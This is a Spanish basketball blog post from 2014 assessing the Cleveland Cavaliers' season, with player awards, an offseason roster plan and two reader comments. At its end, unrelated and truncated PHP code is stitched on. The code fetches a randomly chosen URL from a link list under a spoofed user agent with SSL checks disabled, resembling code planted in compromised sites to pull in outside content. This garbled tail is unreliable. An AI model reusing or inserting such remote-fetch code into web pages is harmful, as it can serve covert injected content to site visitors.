Cleveland Cavaliers: Insuficiente

16 de June de 2014 por txusma

No lo vamos a negar. Desde que Lebron James abandonara el barco y los Cavs descendieran a los infiernos (19 victorias tan solo en la 2010-2011), el equipo ha ido mejorando su balance temporada a temporada. Los primeros tres años de su travesía por los desiertos fueron humillantes, muy duros. En cambio, en esta última temporada ya han presentado batalla y han acariciado en algunos momentos el sueño de  llegar a la postemporada. Sin embargo, han estado por debajo del número de victorias que pronosticamos en su momento y es inevitable no sentir cierto poso de decepción con prácticamente todos los protagonistas de esta historia.

Kyrie Irving sigue siendo la gran esperanza de este equipo pero estoy seguro de que los aficionados de Cleveland no están del todo contentos con su rendimiento. A pesar de que ha sido la temporada que más partidos ha disputado (71) sus números muestran un claro paso atrás en su evolución y ni siquiera estamos seguros de que podamos catalogarlo como uno de los 7 mejores bases de la competición. Su relación con el que tenía que ser otro de los pilares de la franquicia, Dion Waiters, no ha sido la mejor y de hecho se ha rumoreado sobre enfrentamientos directos y muy calientes entre los dos. Por su parte, Tristan Thompson ha calcaldo prácticamente su rendimiento de la temporada anterior y no se ha perdido ningún partido en las 2 últimas temporadas que ha disputado. Ha demostrado ser un jugador útil y válido para la NBA pero parece que ya ha alcanzando su techo. Y Anthony Bennett empezó la temporada con una terrorífica racha de partidos sin anotar que seguramente ha marcado su rendimiento durante el resto de la misma. Falto de confianza, no ha sido hasta el final de la liga regular en que ha mostrado algunos detalles del jugador que los Cavs esperan que sea. 

Paremos un momento aquí. ¿Qué tienen en común los 4 jugadores que hemos nombrado? Pues que son jugadores escogidos dentro de las 4 primeras elecciones de los últimos 3 drafts. ¿Han dilapidado los regalos de la diosa fortuna cómo opina mucha gente? Pues no estoy del todo acuerdo. Irving ha demostrado ser un legítimo número 1, se la jugaron con Tristan Thompson y no podemos decir que se equivocaran (se escogieron mejores jugadores que él en aquel draft pero nadie los habría drafteado en el número 4, Valanciunas en todo caso), se la volvieron a jugar con Dion Waiters y tampoco les ha salido del todo mal (no iban a draftear a Lillard teniendo a Irving y había muchísimas dudas con Andre Drummond), y lo de Anthony Bennett aún está por ver (había alguno que pedía la elección de Otto Porter, así que…).

Estos jugadores, más los veteranos Anderson Varejao (sano por fin) y Jarrett Jack (ni de lejos al nivel de los Warriors) formaban el núcleo central del equipo hasta principios de enero. Concretamente el día 6 llegó a la franquicia Luol Deng para llenar el enorme hueco que había en el puesto de alero. El británico no ha rendido al nivel que lo hacía en los Bulls según él porque entre otras cosas “en los Bulls nunca se habría permitido entrenar como lo hacen en Cleveland”. Está claro que entre Tim Thibodeau y Mike Brown debe de haber más de una y más de dos diferencias (y posiblemente más de 100). Para completar el equipo y quemar todas las opciones de llegar a la postemporada, se hicieron en el trade deadline con Spencer Hawes pero a pesar de que el ex de Philadelphia cumplió y formó un interesante juego interior junto a Varejao y Thompson, ya era tarde. Los Cavaliers se quedarían en 33 victorias y verían como los playoffs se les escapaban claramente a pesar de estar encuadrados en una de las peores conferencias de todos los tiempos.

De todas maneras, hay sitio para la esperanza. El equipo era muy joven y estaba comandando por un entrenador que solo ha demostrado hacerlo bien cuando cuenta entre sus filas con un tal Lebron James. A pesar de todo se ha mejorado mucho el aspecto defensivo y nada hace pensar que con otro entrenador más capacitado, más experiencia por parte de sus jugadores claves, un par de fichajes veteranos y (¡hola otra vez diosa fortuna¡) el número 1 de un draft que parece antológico no puedan dar otro paso más. Esta vez, eso sí, debería ser el definitivo.

PREMIOS

MVP: Con paso atrás o sin paso atras, Kyrie Irving (20.8p – 6.1a – 1.5rob) sigue siendo la estrella indiscutible de su equipo. Se enfrenta a su cuarto año como profesional lo que significa firmar su primer contrato “libre”. Parece claro que pedirá el máximo pero ¿se lo darán los Cavs? Necesitaría volver a su nivel de la 2012-2013 para no despertar ningún tipo de duda.

Rookie: Anthony Bennett ha decepcionado, sobretodo porque es el actual número 1 del draft, pero en cambio la irrupción de un jugador que no fue escogido como el australiano Matthew Dellavedova (4.7p – 2.6a) ha significado una grata sorpresa. No está claro si tendrá sitio en la NBA en un futuro pero él pone todo de su parte.

Sorpresa: A pesar de disputar un buen año rookie, Tyler Zeller (5.7p – 4r) fue regalado a lo más hondo del banquillo durante los primeros meses de liga regular. A partir de finales de año entró más asiduamente en la rotación y acabó demostrando otra vez que tiene sitio en el equipo.

Decepción: Esta vez sí que podemos dar por finalizada la carrera de Andrew Bynum (8.4p – 5.3r), al que le costará mucho engañar a algún otro equipo de la liga. Los Cavs le ofrecieron un contrato que podría haberle comportado 24 millones en 2 años si se lo hubiera tomado en serio pero él mismo prefirió tirarlo todo por la borda a finales de año cuando empezó a jugar de manera lamentable y a comportarse como el niñato que es en los entrenamientos. Acabó traspasado a los Bulls que lo despidieron ipso-facto. Otro que ha hecho el ridículo más espantoso ha sido Earl Clark (5.2p), que pareció un jugador aprovechable en los Lakers de la 2012-2013 y que ha acabado la temporada sin equipo, tras ser traspasado a los Sixers, despedido, contratado por los Knicks y no renovado. Demasiados movimientos.

Esfuerzo en vano: No debe ser fácil llegar a la liga y tener a 3 entrenadores diferentes en tus primeras 3 temporadas. Tristan Thompson (11.7p – 9.2p) ha  superado ese problema como ha podido, ha trabajado duro y lo ha dado todo por el equipo en los 82 partidos que se han disputado. Como premio, los Cavs lo han puesto públicamente a la venta.

JUGANDO A GM

Es posible que Dan Gilbert haya hecho un pacto con el diablo y le haya dado su alma a cambio de buenas elecciones del draft o tal vez el caprichoso azar ha querido compensar a la franquicia tras “The Decision”. La cuestión es que a pesar de contar tan solo con el 1.7% 2.4% de posibilidades, los Cleveland Cavaliers vuelven a ser los primeros en escoger en el número 1 del draft. Parece ser que esta hornada cuenta con 3 jugadores que pueden cambiar el destino de una franquicia así que si se están quietos y no hacen ninguna tontería es difícil que se equivoquen. Entre Wiggins, Parker y Joel Embiid yo eligiría al pívot camerunés y en ningún momento se me pasaría por la cabeza traspasarlo. Spencer Hawes acaba contrato y tenemos una Team Option sobre Anderson Varejao. Posiblemente dejaría marchar a los 2 y buscaría un traspaso para Tristan Thompson. Es un jugador que me gusta pero su renovación está cerca, hay que darle minutos a Bennett y es un buen activo. Con Bennett, Embiid y Zeller en el juego interior se echa en falta algún jugador veterano que asuma tiros. ¿Cuando me pedirían Pau Gasol o Zach Randolph? Tal vez con un contrato de 10-11 kilos x 2 o 3 temporadas podríamos convencerlos. El jugador de los Grizzlies parece a simple vista más compatible con Embiid. Después, un Drew Gooden/Patrick Patterson/DeJuan Blair/Jason Smith completarían el juego interior por poco dinero. 

La segura marcha de Luol Deng nos deja un agujero considerable en el puesto de alero. Una lástima que el ex de los Bulls no esté a gusto porque seria una buena pieza. El problema es que no le vamos a sobrepagar para que se quede a disgusto y tampoco podemos tirar la casa por la ventana con la renovación de Irving a la vuelta de la esquina y el run-run de una posible vuelta de Lebron James a su estado natal flotando en el ambiente. Jugadores como Rudy Gay o Gordon Hayward quedan fuera del alcance pero ¿qué me decís de Trevor Ariza o Evan Turner? Tal vez aún serían demasiado. De ser así habría que conformarse con un Al-Farouq Aminu que podría aportar la defensa y los rebotes que sus compañeros en el juego exterior a veces olvidan. Mantenemos a Jack y renovaría, sin alardes, a Alonzo Gee y CJ Miles. A Dellavedova también me lo quedaría. Faltaría la pieza que podría conseguir por Thompson. Un escolta como Gerald Henderson o un escolta-alero como Martell Webster nos podrían venir muy bien.

Así que podría presentar un equipo bastante flexible formado por:

PG: Kyrie Irving, Jarret Jack
SG: Dion Waiters, Martell Webster, Matthew Dellavedova
SF: Al Farouq Aminu, CJ Miles, Alonzo Gee
PF: Zach Randolph, Anthony Bennett
C: Joel Embiid, Jason Smith, Tyler Zeller
Imágenes | AP Photos / Getty Images

Comenta

2 comentarios a esta entrada

  1. Denise dice:
    #1

    Pues yo veo a Lebron retornando a Cavs y a Pau de 4 haciendo pareja con Embiid, lo que directamente haría que fuesen candidatos nº1 al anillo.
    ¿Mike Brown sigue siendo el entrenador de los Cavs? Si lo sigue siendo, en el “Jugando a GM” te falat despedirlo.
    Nota: El porcentaje que tenía Cavs de llevarse el pick 1 era de 1’8%

      Citar

  2. Esteban dice:
    #2

    que franquicia sin rumbo, apurando a los jovenes para que sean ganadores cuando no estan listos, mezclando jugadores experimentados que nisiquiera estan a gusto alli, y para completar una coleccion de pick top 5 en los ultimos años

    yo haria borron y cvuenta nueva, irving, waiters, jabari, bennet y zeller, y que sea lo que dios quiera, si quedan fuera de PO al menos sus jovenes habran sumado experiencia

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>